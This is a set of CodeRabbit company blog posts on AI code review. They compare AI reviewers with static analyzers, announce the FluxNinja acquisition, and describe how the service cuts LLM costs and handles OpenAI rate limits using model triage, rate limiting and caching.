**Smart review skipping:** The tool intelligently omits in-depth reviews for simpler changes, such as typo corrections, or when the overall changes appear satisfactory. As a code reviewer, CodeRabbit is complementary to code generators. Unlike other code reviewers, CodeRabbit provides a comprehensive, context-driven review of the code. Designed with AI as the core focus, its base prompts are open-source. 
## Comparative analysis: Accuracy and efficiency AI code reviewers and SCAs are very different tools with their own strengths and weaknesses. Two areas to pay attention to are accuracy and efficiency in pinpointing errors and improving code quality. SCAs excel at pinpointing syntactic errors and standard violations. They rely on predefined rules so their accuracy is high for specific, rule-based issues. The flip side to this is that they’re likely to miss complex, context-specific bugs. AI code reviewers fill in the gap here. They go beyond syntax to help you understand the context and logic of the code. In addition to identifying basic errors, they also reveal deeper logical and structural issues, leading to more comprehensive error detection. They even learn over time, continuously improving their ability to detect a wider range of errors and adapt to the evolving complexities of coding projects. In terms of efficiency, SCAs are quick to scan code for rule-based errors, providing immediate feedback. However, their efficiency can take a hit when dealing with complex, nuanced issues that go beyond their rule set. They may even slow down the review process, as developers might need to spend additional time interpreting and resolving these complex issues that the analyzer couldn't fully address. AI code reviewers are thorough and swift. They can review large volumes of code quickly, understanding context and offering relevant suggestions. As AI code reviewers become more advanced, they might reduce the reliance on SCAs, giving devs more time for strategic tasks, enhancing overall productivity. While SCAs are dependable for straightforward, rule-based error detection, AI code reviewers offer a broader, more nuanced analysis. They bring efficiency and depth to the code review process, making them a powerful asset in modern software development. 
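As a rough illustration of the difference described in this section, the sketch below implements a single rule in the style of a static analyzer, using Python's standard `ast` module. The function name `find_bare_excepts` and the `SAMPLE` snippet are assumptions made up for this example; real analyzers such as SonarQube or ESLint ship far larger rule sets.

```python
import ast

# Hypothetical snippet under review. It contains one rule violation
# (a bare `except:`) and one logic bug that no syntax rule describes.
SAMPLE = '''
def average(values):
    try:
        return sum(values) / (len(values) - 1)  # logic bug: should divide by len(values)
    except:
        return 0
'''


def find_bare_excepts(source):
    """Return line numbers of bare `except:` clauses without running the code."""
    tree = ast.parse(source)
    return [
        node.lineno
        for node in ast.walk(tree)
        if isinstance(node, ast.ExceptHandler) and node.type is None
    ]


if __name__ == "__main__":
    for lineno in find_bare_excepts(SAMPLE):
        print(f"line {lineno}: bare 'except:' hides unexpected errors")
```

The rule reliably flags the bare `except:`, but nothing in it can notice that the average divides by the wrong count. That kind of context-dependent mistake is what this section suggests an AI reviewer is better placed to catch.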
## Choosing the right tool for your needs

Choosing between SCAs and AI code reviewers boils down to understanding what your project really needs, what your team can handle, and where you're heading in the long run. Here are some key factors to weigh, along with pointers for different development scenarios:

* **Project complexity and size:** For small projects or startups with limited resources, an SCA is often sufficient. It provides basic error detection and code quality checks without a significant investment. Larger, more complex projects might benefit more from an AI code reviewer. The advanced capabilities of AI tools in understanding context and logic help maintain code quality at scale.
* **Team expertise and learning curve:** For teams new to coding or less experienced, SCAs are an ideal starting point. They offer clear feedback on syntax and style, aiding in learning and maintaining coding standards. Conversely, teams with more experience may benefit more from AI code reviewers. These tools provide deeper insights and handle complex code structures effectively, which suits teams adept at managing advanced feedback and suggestions.
* **Budget and resource availability:** Cost-conscious projects with tight budgets should lean towards SCAs for their affordability and ease of integration. If the budget allows for a more substantial investment in long-term efficiency and code quality, AI code reviewers are the way to go. The initial higher costs are often justified by the time savings and advanced analysis they bring.
* **Integration and workflow:** Consider how well the tool integrates with your existing development workflow. SCAs are typically easier to integrate and use with fewer changes to the current workflow. AI code reviewers, while possibly requiring more integration effort, offer a more seamless code review process once set up, especially in advanced development environments.
* **Long-term development goals:** For ongoing projects with evolving codebases, AI code reviewers can be a strategic investment, providing ongoing learning and adaptation to new patterns and practices. SCAs are more suited for projects with a stable codebase and well-defined coding standards, where major changes in technologies or practices are not expected.

In the end, picking between SCAs and AI code reviewers comes down to your team's expertise, the intricacy of your project, how much you can spend, and your long-term goals. If you've got a smaller project or are just getting started, you might lean towards the clear-cut, rule-focused style of SCAs. But for larger, evolving projects, the deeper, adaptive insights from AI code reviewers could be the way to go.

With our AI-first approach, we harness the full potential of artificial intelligence to streamline and enhance coding practices. Join us as we push the limits of AI in coding, and see how [CodeRabbit](https://coderabbit.ai/) can transform your development process.

FluxNinja joins CodeRabbit

Aravind Putrevu — Sat, 16 Mar 2024 00:00:00 GMT

We are excited to announce that CodeRabbit has acquired [FluxNinja](https://www.fluxninja.com/), a startup that provides a platform for building scalable generative AI applications. This acquisition will allow us to ship new use cases at an industrial pace while sustaining our rapidly growing user base. FluxNinja's Aperture product provides advanced rate and concurrency limiting, caching, and request prioritization capabilities that are essential for reliable and cost-effective AI workflows.

Since our launch, [Aperture's open-source](https://github.com/fluxninja/aperture) core engine has been critical to our infrastructure. Our initial use case centered around [mitigating aggressive rate limits](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits) imposed by OpenAI, allowing us to prioritize paid and real-time chat users during peak load hours while queuing requests from free users. Further, we used Aperture's [caching and rate-limiting capabilities](https://blog.coderabbit.ai/blog/how-we-built-cost-effective-generative-ai-application) to manage costs, which in turn allowed us to offer open-source developers a fully featured free tier by minimizing abuse. These capabilities allowed us to scale our user base without ever putting up a waitlist and at a price point that is sustainable for us. With Aperture's help, CodeRabbit has scaled to over 100K repositories and several thousand organizations under its review in a short period.

We started CodeRabbit with a vision to build an AI-first developer tooling company from the ground up. Building enterprise-ready applied AI tech is unlike any other software engineering challenge of the past. Based on our learnings while building complex workflows, it became apparent that we need to invest in a platform that can solve the following problems:

* **Prompt rendering:** Prompt design and rendering is akin to responsive web design.
Web servers render pages based on the screen size and other parameters. For example, on a mobile device, navigation bars are usually rendered as hamburger menus, making it easier for human consumption. Similarly, we need a prompt server that can render prompts based on the context windows of underlying models and prioritize the packing of context based on business attributes, making it easier for AI consumption. It's not feasible to include the entire repository, past conversations, documentation, learnings, etc. in a single code review prompt because of the context window size limitations. Even if it were possible, AI models exhibit poor recall when doing an inference on a completely packed context window. While tight packing may be acceptable for use cases like chat, it’s not for use cases like code reviews that require accurate inferences. Therefore, it's critical to render prompts in such a way that the quality of inference is high for each use case, while being cost-effective and fast. In addition to packing logic, basic guardrails are also needed, especially when rendering prompts based on inputs from end-users. Since we provide a free service to public repositories, we have to ensure that our product is not misused beyond its intended purpose or tricked into divulging sensitive information, which could include our base prompts.
* **Validation & quality checks:** Generative AI models consume text and output text. On the other hand, traditional code and APIs require structured data. Therefore, the prompt service needs to expose a RESTful or gRPC API that can be consumed by the other services in the workflow. We touched upon the rendering of prompts based on structured requests in the previous point, but the prompt service also needs to parse and validate responses into structured data and measure the quality of the inference. This is a non-trivial problem, and multiple tries are often required to ensure that the response is thorough and meets the quality bar.
For instance, we found that when we pack multiple files in a single code review prompt, AI models often miss hunks within a file or miss files altogether, leading to incomplete reviews.
* **Observability:** One key challenge with generative AI and prompting is that it's inherently non-deterministic. The same prompt can result in vastly different outputs, which can be frustrating, but this is precisely what makes AI systems powerful in the first place. Even slight variations in the prompt can result in vastly inferior or noisy outputs, leading to a decline in user engagement. At the same time, the underlying AI models are ever-evolving, and the established prompts drift over time as the models get regular updates. Traditional observability is of little use here, and we need to rethink how we classify and track generated output and measure quality. Again, this is a problem that we have to solve in-house.

While FluxNinja's Aperture project was limited to solving a different problem around load management and reliability, we found that the underlying technology and the team's expertise were a perfect foundation for building the AI platform.

Prompt engineering is in its nascent stage but is emerging as a joystick for controlling AI behavior. Packing the context window with relevant documents (retrieval augmented generation, aka RAG) is also emerging as the preferred way of providing proprietary data compared to fine-tuning the model. Most AI labs focus on increasing the context window rather than making fine-tuning easier or cheaper. Despite the emergence of these clear trends, applied AI systems are still in their infancy. None of the recent AI vendors seem to be building the "right" platform, as most of their focus has been on background/durable execution frameworks, model routing proxies/gateways, composable RAG pipelines, and so on. Most of these approaches fall short of what a real-world AI workflow requires.
The right abstractions and best practices will still have to appear, and the practitioners themselves will have to build them. AI platforms will be a differentiator for AI-first companies, and we are excited to tackle this problem head-on with a systems engineering mindset. We are excited to have the FluxNinja team on board and to bring our users the best-in-class AI workflows. We are also happy to welcome [Harjot Gill](https://www.linkedin.com/in/harjotsgill/), the founder of FluxNinja, and the rest of the team to CodeRabbit.
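
To make the prompt rendering problem described above more concrete, here is a minimal sketch of priority-based context packing. It is not CodeRabbit's prompt server; `ContextItem`, `pack_context`, the word-count token estimate, and the 70% fill target are all assumptions chosen for illustration. The idea it shows is the one from the post: pack the most important context first, and leave headroom instead of filling the window completely, since recall degrades on a fully packed window.

```python
from dataclasses import dataclass


@dataclass
class ContextItem:
    name: str      # hypothetical label, e.g. "diff" or "past_conversation"
    text: str
    priority: int  # assumed business attribute: lower number = more important


def estimate_tokens(text: str) -> int:
    # Crude stand-in for a real tokenizer: count whitespace-separated words.
    return len(text.split())


def pack_context(items, context_window, fill_percent=70):
    """Greedily pack items by priority into a share of the context window.

    Returns the packed items and the estimated tokens used. Items that do
    not fit in the remaining budget are skipped, so a smaller low-priority
    item can still be included after a larger one was rejected.
    """
    budget = context_window * fill_percent // 100
    packed, used = [], 0
    for item in sorted(items, key=lambda i: i.priority):
        cost = estimate_tokens(item.text)
        if used + cost <= budget:
            packed.append(item)
            used += cost
    return packed, used
```

A real renderer would use the model's own tokenizer and would likely truncate or summarize items that do not fit rather than dropping them outright; the greedy loop is only the simplest policy that respects both priority and budget.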

Modern AI stack for developer productivity

Aravind Putrevu — Fri, 05 Jan 2024 00:00:00 GMT

The 'modern AI stack for developer productivity' refers to a comprehensive set of AI-powered developer tools that improve developer productivity in building software. In 2023, Large Language Models (LLMs) caused significant disruption, leading to a rapid increase in the adoption of artificial intelligence within the development lifecycle, particularly in the realm of 'developer productivity tools'.

A significant majority of software development projects are now leveraging some form of AI, specifically Generative AI, to transform traditional development workflows into more intelligent, efficient, and automated processes.

The modern AI stack for developer productivity is reshaping the landscape of software development, making once time-consuming or complex tasks more manageable and automated. From helping with research and code writing to reviewing code and ensuring quality, the modern AI stack is a testament to how AI is not just an add-on but an integral component of the software development process.

Are you leveraging the full potential of the modern AI tech stack in your projects? This article may give you the perspective needed to understand how it can elevate your work to the next level.

## Three Pillars of the Modern AI Stack for Developer Productivity

There are three key components in the modern AI stack for developer productivity that are useful in different stages of the development lifecycle. These three stages are the research or knowledge gathering stage, the coding stage, and the final code review stage. Let’s discuss each of these stages in detail and how AI tools can help improve developer productivity in each.

### Knowledge

The Knowledge pillar is central to the modern AI stack.
It involves AI systems helping developers gather and synthesize knowledge, usually in the form of a chat or question-and-answer session. A prime example in this space is [ChatGPT](https://chat.openai.com/).

* [ChatGPT](https://chat.openai.com/) is the leading AI assistant to quickly answer developers' questions on syntax, frameworks, debugging, etc.
* It acts like a supercharged search engine, saving developers time from having to dig through documentation or StackOverflow.
* ChatGPT can also explain concepts, provide code examples and suggestions, and identify knowledge gaps. Over time, these models will get better at technical reasoning with more training data.
* [StackOverflow Community Search](https://stackoverflow.co/labs/search/) is another product in this category which instantly summarizes the solution.

This transformation is crucial in development environments where quick access to information and rapid problem-solving are essential.

#### Challenges

One of the main challenges is ensuring the accuracy and reliability of the answers. AI systems might sometimes generate plausible but incorrect or biased responses.

### Code Generation

Code generation through AI marks a significant leap in software development. AI models, trained on vast code repositories, can now assist in generating code snippets and at times entire modules. This accelerates the coding process. The evolution of this pillar is a testament to AI's growing understanding of programming languages and logic, offering a collaborative tool that augments the developer's capabilities rather than replacing them.

* AI models like OpenAI’s GPT-4 Code Interpreter are leading this segment.
* They aid in writing code, offering suggestions, and even generating entire code blocks based on user input.
* They are particularly beneficial in increasing development speed and making coding more accessible to non-experts.
* [GitHub Copilot](https://github.com/features/copilot) introduces this experience in the IDE (such as VS Code) where you code. It enhances coding efficiency by rapidly suggesting code blocks and functions directly within the editor. This helps developers generate boilerplate code, complete repetitive tasks and implement common patterns much faster.

#### Challenges

The limitations include dependency on the training data, which may not always represent the most efficient or modern coding practices. Ethically, there are concerns about code originality and the potential for inadvertently generating vulnerable or buggy code.

### Code Review

AI’s role in code review is about ensuring quality, compliance, and optimization. Unlike traditional code reviews, which are time-consuming and prone to human oversight, AI-driven code reviews are swift and more thorough. AI models can scan code for patterns, anomalies, and compliance with coding standards, offering insights and suggestions for improvements. This pillar has evolved from basic syntax checking to sophisticated analysis, significantly enhancing the code quality.

* Automated code review tools, like [CodeRabbit](https://coderabbit.ai/), help in identifying bugs, evaluating whether the PR achieves its objectives, and ensuring adherence to coding standards. The in-line comments make it easier to use and put things in motion.
* These tools can analyze code more thoroughly and quickly than human reviewers, leading to higher quality software. This frees up developer time as well as improves code quality before reaching production.
* Over time, CodeRabbit could fine-tune to a team's specific code review checklist and the feedback provided in comments, offering even more accurate suggestions and naturally extending access to organizational knowledge through code reviews.

#### Challenges

If the issues do not contain enough information about the requirements, the PR assessment against those requirements might not give as accurate a picture as you would expect.

## Prioritize knowledge and review over generation

While most people would be attracted by the promises code generation offers, I believe it will not have as big an impact on developer productivity as the other two: Knowledge and Code Review.

While code generation tools may save some time in writing standard code, understanding and fine-tuning the output remains crucial. Overreliance on AI for code generation also carries the risk of code inaccuracies and legal issues with AI-generated code.

The real productivity gains come from improving organizational knowledge and the code review process to ensure high standards of code quality. As [StackOverflow rightly mentioned](https://stackoverflow.blog/2023/12/29/the-hardest-part-of-building-software-is-not-coding-its-requirements/): *The hardest part of building software is not coding, it is requirements*

Software is more than just code; it's about meeting the users' needs. The Knowledge and Code Review pillars align tightly with this goal, which is why I urge you to prioritize Knowledge and Code Review tools in your modern AI stack.

## Conclusion

The integration of these three pillars - Knowledge, Code Generation, and Code Review - forms a robust foundation in the AI-driven development process.
Each pillar complements the others, creating a synergistic environment where developers are empowered with advanced tools and insights, leading to more efficient, innovative, and error-free software development.

How we built a cost-effective Generative AI application

Aravind Putrevu — Fri, 22 Dec 2023 00:00:00 GMT

Since its inception, CodeRabbit has experienced steady growth in its user base, comprising developers and organizations. Installed on thousands of repositories, CodeRabbit reviews several thousand pull requests (PRs) daily. We have [previously discussed](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits) our use of an innovative client-side request prioritization technique to navigate OpenAI rate limits. In this blog post, we will explore how we manage to deliver continuous, in-depth code analysis cost-effectively, while also providing a robust, free plan to open-source projects.

## CodeRabbit's Product Offering and LLM Consumption

CodeRabbit is an AI-first PR Review tool that uses GPT APIs for various functionalities. CodeRabbit offers the following tiers of service:

* **CodeRabbit Pro:** A paid service providing in-depth code reviews for private repositories. It's priced according to the number of developers, starting with a full-featured 7-day free trial.
* **CodeRabbit for Open Source:** A free service offering in-depth code reviews for open source (public) repositories.
* **CodeRabbit Free:** A free plan for private repositories, providing summarization of code changes in a PR.

Our vision is to offer an affordable, AI-driven code review service to developers and organizations of all sizes while supporting the open-source community. We are particularly mindful of open-source projects, understanding the challenges in reviewing community contributions. Our goal is to reduce the burden of code reviews for open-source maintainers by improving submission quality before the review process begins.

CodeRabbit's review process is automatically triggered when a PR is opened in GitHub or GitLab. Each review involves a complex workflow that builds context and reviews each file using large language models (LLMs).
Code review is a complex task that requires an in-depth understanding of the changes and the existing codebase. High-quality review comments necessitate state-of-the-art language models such as gpt-4. However, these models are significantly more expensive than simpler models, as shown by the [10x-30x price difference](https://openai.com/pricing) between gpt-3.5-turbo and gpt-4 models.

![](https://framerusercontent.com/images/y2qM0vieM6oWHGW7iILbR8rbQ.png)

*The gpt-4 model is 10-30x more expensive than the gpt-3.5-turbo model*

Our primary cost driver is using OpenAI's API to generate code review comments. We will share our cost optimization strategies in the following sections. Without these optimizations, our free offering to open-source projects would not be feasible.

Let's take a look at the strategies that helped us optimize the cost and improve user experience.

## 1\. Dual-models: Summarize & Triage Using Simpler Models

For less complex tasks such as summarizing code diffs, simpler models such as gpt-3.5-turbo are adequate. As an initial optimization, we use a mix of models, as detailed in [our earlier blog post](https://blog.coderabbit.ai/blog/coderabbit-deep-dive). We use gpt-3.5-turbo to compress large code diffs into concise summaries, which are then processed by gpt-4 for reviewing each file. This dual-model approach significantly reduces costs and enhances review quality, enabling us to manage PRs with numerous files and extensive code differences.

Additionally, we implemented triage logic to skip trivial changes from the review process. We use the simpler model to classify each diff as either trivial or complex, as part of the same prompt used for code diff summarization. Low-risk changes such as documentation updates, variable renames, and so on, are thus excluded from the thorough review process.
This strategy has proven effective, as simpler models can accurately identify trivial changes. By using this dual-model approach for summarization and filtering out trivial changes, we save almost 50% on costs.

## 2\. Rate-limiting: Enforcing Fair Usage

Upon launching our free service for open-source projects, we noticed individual developers using it as a coding co-pilot by making hundreds of incremental commits for continuous feedback. CodeRabbit, designed for thorough code reviews unlike tools such as GitHub Copilot, incurs high costs when used in this manner. Therefore, we implemented hourly rate-limits on the number of files and commits reviewed per user, to control excessive usage without compromising user experience. These limits vary across different product tiers. For example, we set more aggressive limits for open-source users compared to trial and paid users.

To implement these rate-limits, we evaluated various options for serverless environments. We opted for [FluxNinja Aperture](https://fluxninja.com/) for its simplicity and policy sophistication. We were already using Aperture for managing [OpenAI rate limits](https://blog.coderabbit.ai/blog/coderabbit-openai-rate-limits), making it a natural choice for our rate-limiting needs as well.

In FluxNinja Aperture, policies are decoupled from application logic through labels, enabling new policy additions without altering application code. We apply labels in FluxNinja Aperture, wrap the review workload with its SDK, and write policies that enforce limits on those labels. For example, we enforce a limit of 3 reviews per hour (1 review every 20 minutes) for open-source users, allowing a burst of 2 back-to-back reviews, as shown in the screenshots below.
![](https://framerusercontent.com/images/1etMQYd13gki6CPITdyj6YXBPI.png)

Integration with FluxNinja Aperture SDK

*Rate-limiting commits per hour for open-source users*

![](https://framerusercontent.com/images/itoaYJdM5RE6at6nxflhZKd88mk.png)

*Wait time feedback to the user in a comment*

Given the high cost and capacity constraints of state-of-the-art models such as gpt-4, rate-limiting is an essential requirement for any AI application. By implementing fair-usage rate limits, we are saving almost 20% on our costs.

![](https://framerusercontent.com/images/ncC7v5MVxXsKGAOezXEVyd7SJbM.png)

*Rate limit metrics for open-source users*

## 3\. Caching: Avoid Re-generating Similar Review Comments

We believe that building user habits around AI involves seamlessly augmenting existing workflows. Therefore, AI code reviews must be continuous: they should trigger as soon as a PR is opened and incrementally update the summary and generate review comments as more commits are added.

However, this approach can become expensive and generate repetitive feedback, as similar review comments are re-generated for each commit. We observed that most incremental commits involve minor adjustments or bug fixes in the initial implementation. To address this, we implemented a caching layer to avoid re-generating similar review comments for incremental commits.

Fortunately, Aperture also provides a simple caching mechanism for summaries from previous commits, using the same API call where we implemented rate limits. During each incremental review, we use the simpler model for a semantic comparison of the code changes described in both summaries. If the changes are similar, we skip the review for those files to prevent re-generating similar review comments.
This method differs from vector similarity-based caching techniques, as we use an LLM to compare summaries. Vector similarity-based approaches wouldn't be effective in our case, as the summaries require semantic comparison. We have integrated this method into the same prompt used for code diff summarization and triage.

By using the more cost-effective gpt-3.5-turbo model as an advanced similarity filter before invoking the more expensive gpt-4 model for the same file, we have saved almost 20% of our costs by avoiding the generation of similar review comments.

## Conclusion

In this blog post, we briefly discussed how state-of-the-art LLMs such as gpt-4 can be expensive in production. We also shared our strategy of using a combination of simpler models, rate limits, and caching to optimize operational costs. We hope our experiences can assist other AI startups in optimizing their costs and developing cost-effective AI applications.
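
For readers who want to experiment with the fair-usage limit from the rate-limiting section, the following is a minimal token bucket sketch of "3 reviews per hour with a burst of 2". It does not use the FluxNinja Aperture SDK and makes no claim about how Aperture implements its policies; the `TokenBucket` class and its parameter names are hypothetical. A capacity of 2 models the burst, and one token refilled every 1,200 seconds models one review every 20 minutes.

```python
import time


class TokenBucket:
    """Illustrative in-memory token bucket (not the Aperture API)."""

    def __init__(self, capacity, refill_seconds, clock=time.monotonic):
        self.capacity = capacity              # maximum burst size
        self.refill_seconds = refill_seconds  # seconds needed to earn one token
        self.clock = clock                    # injectable clock, useful in tests
        self.tokens = float(capacity)         # start with a full bucket
        self.updated = clock()

    def _refill(self):
        # Add the fraction of a token earned since the last update, capped at capacity.
        now = self.clock()
        elapsed = now - self.updated
        self.tokens = min(self.capacity, self.tokens + elapsed / self.refill_seconds)
        self.updated = now

    def try_acquire(self):
        """Return (allowed, wait_seconds) for one review request."""
        self._refill()
        if self.tokens >= 1:
            self.tokens -= 1
            return True, 0.0
        # Time until the bucket holds one full token again.
        wait = (1 - self.tokens) * self.refill_seconds
        return False, wait


# Assumed configuration for an open-source user: burst of 2, one review per 20 minutes.
open_source_limit = TokenBucket(capacity=2, refill_seconds=20 * 60)
```

The wait time returned on rejection is the kind of value that could be surfaced to the user in a comment, as the post describes. In production, the bucket state would need to live in shared storage and be keyed per user, since a serverless function cannot rely on in-process memory.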

Boosting Engineering Efficiency Using AI Code Reviews for Remote Teams

Aravind Putrevu — Sun, 12 Nov 2023 00:00:00 GMT

## Introduction

Welcome to the future, where a morning commute involves going from bed to home office. The dress code is "business on top, pajamas down below." In this new world of remote work, tech teams worldwide are getting good at video calls and wishing for strong Wi-Fi like strong coffee. But here's the question: How do we maintain engineering efficiency when Joe from frontend is in Mexico, and DevOps Dave just started his day in Dublin?

This setup presents a unique challenge: ensuring that code reviews, which are essential for code quality, are consistent, timely, and efficient. Have you ever missed a code review because it was late at night? We've all been there. Are you waiting for days to get feedback because your reviewer is in a different time zone? Oh, the frustration!

Introducing the helpful algorithm: AI-driven code reviews. They're like a reliable friend who never sleeps (because they're code) and knows all the coding rules. This article explores how these intelligent bots fill the gaps in our fast-paced, sometimes slow, new world.

## Direct Correlation: Remote Engineering Challenges & AI Solutions

Remember the good old days when you could easily ask a quick question to a colleague by just going to their desk? Those days are gone, just like floppy disks and dial-up internet. Nowadays, with remote work, we have traded cubicles for couches and water cooler chats for solo trips to the fridge. Let's address the three significant challenges of remote engineering and explore how AI's modern technology can provide a solution.

* **Communication Gaps:** We've all sent that "quick query" across the ocean and received a response when the moon's high in our sky.
Time zones, while fantastic for the travel and holiday industry, can be the bane of a remote engineer's existence. The lag between question and answer and the lack of in-person interaction can make collaborating feel like you're screaming into a digital void.
  * **AI Solution:** AI doesn't need sleep (lucky them). They're the 24/7 store of the coding world, always open and ready to assist. Offering real-time feedback, irrespective of whether it's midday in Mumbai or twilight in Toronto, AI ensures that time zones remain a challenge only for your travel plans.
* **Delayed Reviews & Feedback Loops:** Here's a familiar scenario: You push code, sit back, and wait. And wait. And wait, some more. Your code is in the ether, waiting for a review that's as elusive as a unicorn. The elongated feedback loops in remote settings can sometimes feel like a seemingly endless game of ping pong, where the ball... disappears.
  * **AI Solution:** Fancy a game-changer? AI provides immediate feedback. With algorithms working at the speed of computers, the waiting game is dramatically reduced. You push, AI reviews, and voilà! Feedback's ready, hotter than a freshly brewed espresso.
* **Code Consistency & Quality:** Have you ever noticed how everyone's homemade bread looks and tastes slightly different? The same goes for code written by engineers scattered across various locales. Influenced by unique experiences and environments, each individual brings slight variances in coding style and approach.
  * **AI Solution:** Call AI the master baker, consistently churning out the perfect loaf every time. AI-driven code review tools maintain a unified standard, ensuring that whether it's Peter in Paris or Lila in Lagos, the quality and consistency of code remain top-notch.
## Real-World Applications & Pitfalls

In a world where data is king, we enjoy hearing success stories (especially when they include pie charts!). However, there are challenges to overcome when it comes to incorporating AI code reviews in a remote environment. Let's explore the real-life stories of AI experts and the significant obstacles they have overcome.

### Common Pitfalls & Solutions

**Over-reliance on AI:** Just as one wouldn't ask a Roomba to do a deep spring-cleaning, leaning too much on AI for code reviews can miss out on the nuanced human touch. Solution: Tech Titans Inc. struck a balance by using AI for preliminary checks and human eyes for final reviews, ensuring that the code was technically sound and made logical sense in the grander scheme.

**Resistance to Change:** Implementing new tools often meets resistance, especially if developers feel their expertise is being questioned. Startup Sensations Ltd. faced a mini rebellion of sorts. Solution: They organized workshops emphasizing AI as a tool to aid, not replace. Showcasing its strengths and limitations bridged the trust gap, smoothing the integration.

**Misunderstanding AI Feedback:** Sometimes, AI can flag something as an error, even if it's a deliberate choice by the coder. This can lead to confusion and wasted effort trying to "fix" what isn't broken. Solution: Both companies implemented clear guidelines on understanding and acting upon AI feedback, ensuring developers knew when to consider and contest.
## Actionable Takeaways

Navigating the intricate maze of code reviewing can be daunting. But fret not! There are some practical steps and considerations to help steer the ship. And speaking of guiding lights, let's first mention a noteworthy tool that's caught the industry's attention.

### CodeRabbit – An AI Code Reviewer

Heard of CodeRabbit? It's this nifty AI tool that's gaining traction. Without all the bells and whistles – it simply reviews your code once pull requests are made. It's a straightforward, no-fuss tool designed to streamline the review process, especially for remote teams.

### Steps for Effective Integration and Adoption

1. **Orientation:** It's crucial to acquaint your team with any new tool. With something like CodeRabbit, a simple hands-on session or tutorial might suffice.
2. **Pilot Testing:** Test the waters first. Let's start with one project or a subset of your team to gauge the tool's efficiency and user-friendliness.
3. **Constructive Feedback:** Encourage an open line of communication. Ensure your team provides feedback about the tool's strengths and areas needing tweaks.
### Balancing AI Assistance with Human Touch[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#balancing-ai-assistance-with-human-touch) No matter how advanced our tools get, there's an underlying essence of human insight that can't be entirely replicated. To ensure the balance: 1. **Sequential Reviews:** Let AI, like CodeRabbit, serve as the preliminary filter. The team should do subsequent, deeper reviews to capture nuances. 2. **Regular Updates:** Keep the AI tool informed. Feedback from human reviewers refines its algorithm, making it more intuitive with time. 3. **Encourage Team Discussions:** After automated reviews, foster team discussions. This ensures the code isn't just machine-compliant, but also logically sound and efficient from a human perspective. ## Conclusion[](https://blog.coderabbit.ai/blog/boosting-engineering-efficiency#conclusion) Ah, the outcome! We've ventured deep into the rabbit hole (no pun intended with CodeRabbit) of AI's transformative role in remote engineering. From the highs of streamlined code reviews to the essential human-AI harmony, it's evident that AI doesn't just knock on the doors of modern engineering—it's barging in, holding a battering ram of innovation. Remember when remote work was a cute little option, often tucked away in the "benefits" section of a job posting? Well, it's not just mainstream now; it's the modus operandi for countless teams globally. As this mode of work continues to snowball, the technological advancements, especially ones like AI-driven code reviewers, aren't merely luxury add-ons. They are becoming vital cogs in the well-oiled machine that a remote engineering team aspires to be. As we stand on the brink of yet more seismic shifts in the way we work and collaborate, it's exhilarating to think of the untapped potential of tools and technologies still on the horizon. The canvas of remote work is vast, and we've only just started splashing it with color. 
Here's to a brighter, more innovative, and yes, more automated future, but always with a sprinkle of irreplaceable human magic.

***Cheers to the codes that bind us, both human and binary.***

Squeezing Water from Stone - Managing OpenAI Rate Limits with Request Prioritization

Aravind Putrevu — Sun, 22 Oct 2023 00:00:00 GMT

Since CodeRabbit launched a couple of months ago, it has received an enthusiastic response and hundreds of sign-ups. CodeRabbit has been installed in over 1300 GitHub organizations and typically reviews more than 2000 pull requests per day. Furthermore, the usage continues to flourish; we are experiencing healthy week-over-week growth.

While this rapid growth is encouraging, we've encountered challenges with OpenAI's stringent rate limits, particularly for the newer `gpt-4` model that powers CodeRabbit. In this blog post, we will delve into the details of OpenAI rate limits and explain how we leveraged [FluxNinja's Aperture](https://www.fluxninja.com/) load management platform to ensure a reliable experience as we continue to grow our user base.

## Understanding OpenAI rate limits

OpenAI imposes [fine-grained rate limits](https://platform.openai.com/docs/guides/rate-limits/overview) on both requests per minute and tokens per minute for each AI model they offer. In our account, for example, we are allocated the following rate limits:

![](https://framerusercontent.com/images/WCNgIwtyOdTtC8iOFvbU3axD8.png)

We believe that the rate limits are in place for several reasons and are unlikely to change in the near future:

* Advanced models such as `gpt-4` are computationally intensive. Each request can take several seconds or even minutes to process. For example, a 30s response time is fairly typical for complex tasks. OpenAI sets these limits to manage aggregate load on their infrastructure and provide fair access to users.
* The demand for AI has outstripped the supply of available hardware, particularly the GPUs required to run these models. It will take some time for the industry to meet this exploding demand.
## CodeRabbit's OpenAI usage pattern and challenges

CodeRabbit is an AI-driven code review application that integrates with GitHub or GitLab repositories. It analyzes pull requests and provides feedback to the developers on the quality of their code. The feedback is provided in the form of comments on the pull request, allowing the developers to enhance the code based on the provided suggestions in the follow-up commits.

![](https://framerusercontent.com/images/Y83rpWAtskEjGPenr3dNOUm6mY.png)

CodeRabbit employs a combination of the `gpt-3.5-turbo` and `gpt-4` family of models. For simpler tasks such as summarization, we use the more economical `gpt-3.5-turbo` model, whereas intricate tasks such as in-depth code reviews are performed by the slow and expensive `gpt-4` model.

Our usage pattern is such that each file in a [pull request is summarized and reviewed concurrently](https://coderabbit.ai/blog/coderabbit-deep-dive). During peak hours or when dealing with large pull requests (consisting of 50+ files), we began to encounter `429 Too Many Requests` errors from OpenAI. Even though we had a retry and back-off mechanism, many requests were still timing out after multiple attempts. Our repeated requests to OpenAI to increase our rate limits were met with no success.

To mitigate these challenges, we cobbled together a makeshift solution for our API client:

* We set up four separate OpenAI accounts to distribute the load.
* We implemented an API concurrency limit on each reviewer instance to cap the number of in-flight requests to OpenAI.
* We increased the back-off time for each retry and increased the number of retries. OpenAI's rate limit headers were not helpful in determining the optimal back-off times, as the [headers](https://platform.openai.com/docs/guides/rate-limits/rate-limits-in-headers) were outdated by tens of seconds and did not consider the in-flight requests.
* We transitioned from a function-based serverless framework to a containerized environment to benefit from extended timeout capabilities, so that instances would not be terminated while requests were in the retry-back-off loop.

Although these adjustments provided temporary relief, the challenges resurfaced as the load increased within a few days. We were doing a lot of guesswork to figure out the "right" number of concurrent requests, back-off times, max retries and so on.

Complicating matters further, we added a chat feature that allows users to consult the CodeRabbit bot for code generation and technical advice. While we aimed for real-time responses, the back-off mechanisms made reply time unpredictable, particularly during peak usage, thereby degrading the user experience.

We needed a better solution, one that could globally manage the rate limits across all reviewer instances and prioritize requests based on user tiers and the nature of requests.

## FluxNinja Aperture to the rescue

We were introduced to the [FluxNinja Aperture](https://www.fluxninja.com/) load management platform by one of our advisors. [Aperture](https://github.com/fluxninja/aperture) is an open-source load management platform that offers advanced rate-limiting, request prioritization, and quota management features. Essentially, Aperture serves as a global token bucket, facilitating client-side rate limits and business-attribute-based request prioritization.
